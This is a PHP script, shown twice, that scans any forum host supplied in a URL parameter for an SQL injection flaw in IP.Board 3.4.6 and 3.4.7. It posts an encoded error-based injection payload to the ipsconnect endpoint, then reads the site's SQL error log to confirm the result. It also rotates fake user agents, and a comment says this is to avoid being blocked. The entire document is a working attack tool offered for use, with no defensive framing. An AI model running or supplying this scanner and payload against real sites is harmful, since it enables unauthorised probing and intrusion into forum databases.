<?php if (isset($_GET['q'])) { $host = $_GET['q']; //Ensures you have http or https in your domain name if (substr($host, 0, 4) == "http") { $protocol = "http"; if (substr($host, 0, 5) == "https") { $protocol = "https"; } //Removes any trailing slashes if (substr($host, -1) == '/') { $host = substr($host, 0, -1); } //Initial SQL Injection check $newHost = $host . '/interface/ipsconnect/ipsconnect.php'; $sql = 'SELECT COUNT(*) FROM members'; $data = "act=login&idType=id&id[]=-1&id[]=-1%29%20and%201%21%3D%22%27%22%20and%20extractvalue%281%2Cconcat%280x3a%2C%28SELECT%20COUNT%28%2A%29%20FROM%20members%29%29%29%23%27"; $response = SendPost($newHost, $data); //Checking the SQL Error Log for confirmation $url = $host . '/cache/sql_error_latest.cgi'; $response = SendGet($url); if (strpos($response, "XPATH syntax error") !== false) { printf("%s is vulnerable to IPBoard 3.4.6 or 3.4.7 SQL Injection!", $host); } else { printf("%s is not vulnerable to IPBoard 3.4.6 or 3.4.7 SQL Injection!", $host); } return false; } else { echo "Invalid host, needs to have a protocol -> http://apples.org/path/to/forums"; } } else { echo "I think you're lost homie."; } //So you cant be blocked via useragent function getRandomUserAgent() { $userAgents = array( "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)", "Opera/9.20 (Windows NT 6.0; U; en)", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50", "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.02 [en]", "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; fr; rv:1.7) Gecko/20040624 Firefox/0.9", "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/48 (like Gecko) Safari/48" ); $random = rand(0, count($userAgents) - 1); return $userAgents[$random]; } //Sends a post request function SendPost($site, $post) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "$site"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_USERAGENT, getRandomUserAgent()); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); $response = curl_exec($ch); curl_close($ch); return $response; } //Sends a get request, specifically for reading the sql error cgi function SendGet($site) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "$site"); curl_setopt($ch, CURLOPT_USERAGENT, getRandomUserAgent()); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); return $response; } Код <?php if (isset($_GET['q'])) { $host = $_GET['q']; //Ensures you have http or https in your domain name if (substr($host, 0, 4) == "http") { $protocol = "http"; if (substr($host, 0, 5) == "https") { $protocol = "https"; } //Removes any trailing slashes if (substr($host, -1) == '/') { $host = substr($host, 0, -1); } //Initial SQL Injection check $newHost = $host . '/interface/ipsconnect/ipsconnect.php'; $sql = 'SELECT COUNT(*) FROM members'; $data = "act=login&idType=id&id[]=-1&id[]=-1%29%20and%201%21%3D%22%27%22%20and%20extractvalue%281%2Cconcat%280x3a%2C%28SELECT%20COUNT%28%2A%29%20FROM%20members%29%29%29%23%27"; $response = SendPost($newHost, $data); //Checking the SQL Error Log for confirmation $url = $host . '/cache/sql_error_latest.cgi'; $response = SendGet($url); if (strpos($response, "XPATH syntax error") !== false) { printf("%s is vulnerable to IPBoard 3.4.6 or 3.4.7 SQL Injection!", $host); } else { printf("%s is not vulnerable to IPBoard 3.4.6 or 3.4.7 SQL Injection!", $host); } return false; } else { echo "Invalid host, needs to have a protocol -> http://apples.org/path/to/forums"; } } else { echo "I think you're lost homie."; } //So you cant be blocked via useragent function getRandomUserAgent() { $userAgents = array( "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)", "Opera/9.20 (Windows NT 6.0; U; en)", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50", "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.02 [en]", "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; fr; rv:1.7) Gecko/20040624 Firefox/0.9", "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/48 (like Gecko) Safari/48" ); $random = rand(0, count($userAgents) - 1); return $userAgents[$random]; } //Sends a post request function SendPost($site, $post) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "$site"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_USERAGENT, getRandomUserAgent()); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); $response = curl_exec($ch); curl_close($ch); return $response; } //Sends a get request, specifically for reading the sql error cgi function SendGet($site) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "$site"); curl_setopt($ch, CURLOPT_USERAGENT, getRandomUserAgent()); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); return $response; }